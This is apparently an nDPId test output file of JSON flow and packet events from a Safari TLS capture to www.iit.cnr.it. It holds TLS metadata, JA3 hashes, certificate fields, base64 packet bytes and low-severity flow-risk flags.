+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620898024084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898024084,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7194MY\/Pce2k\/vaAS\/ohIgwAAAgQFrAQCCAo6VqpvMzDFWAEDAwc="} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620898024085,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898024085,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfeAbt7aT+9DGPz3YAQECxliAAAAQEICjMwxXQ6Vqpv"} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898024056,"flow_last_seen":1620898024085,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898024085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfhAbvK+gqhAAAAALAC\/\/\/8IwAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfiAbtAr8myAAAAALAC\/\/\/HXAAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfjAbsjVMkKAAAAALAC\/\/\/lXgAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025217,"flow_last_seen":1620898025217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025217,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620898025217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025217,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfkAbuNFQaeAAAAALAC\/\/8+CAAAAgQFtAEDAwUBAQgKMzDJ1AAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025217,"flow_last_seen":1620898025217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025217,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620898025217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025217,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtflAbtmxM47AAAAALAC\/\/+cugAAAgQFtAEDAwUBAQgKMzDJ1AAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620898025246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025246,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+Mw2y0GI1TJC6AS\/oiwoAAAAgQFrAQCCAo6Vq73MzDJ0wEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620898025246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025246,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfjAbsjVMkLMNstB4AQECzNqAAAAQEICjMwyew6Vq73"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620898025246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025246,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+H+SkNFyvoKoqAS\/ojjtwAAAgQFrAQCCAo6Vq72MzDJ0wEDAwc="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620898025246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025246,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfhAbvK+gqi\/kpDRoAQECwAwAAAAQEICjMwyew6Vq72"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620898025247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025247,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+RZmQEsjRUGn6AS\/ogMZAAAAgQFrAQCCAo6Vq75MzDJ1AEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620898025247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025247,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfkAbuNFQafWZkBLYAQECwpbAAAAQEICjMwye06Vq75"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620898025247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025247,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+LVp22MQK\/Js6AS\/oitTAAAAgQFrAQCCAo6Vq72MzDJ0wEDAwc="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620898025247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025247,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfiAbtAr8mz1adtjYAQECzKUwAAAQEICjMwye06Vq72"} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025248,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620898025251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025251,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+Xyf4O0ZsTOPKAS\/ohPpwAAAgQFrAQCCAo6Vq75MzDJ1AEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620898025251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025251,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtflAbtmxM488n+DtYAQECxsqwAAAQEICjMwyfE6Vq75"} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025252,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025252,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025277,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025279,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025279,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025281,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025284,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025284,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5392,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898027036,"flow_last_seen":1620898027036,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898027036,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5392,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1620898027036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898027036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Etf1AbvGGXtuAAAAALAC\/\/+JoQAAAgQFtAEDAwUBAQgKMzDQVQAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5393,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1620898027065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898027065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71\/XZbafoxhl7b6AS\/ogqVAAAAgQFrAQCCAo6VrYRMzDQVQEDAwc="} 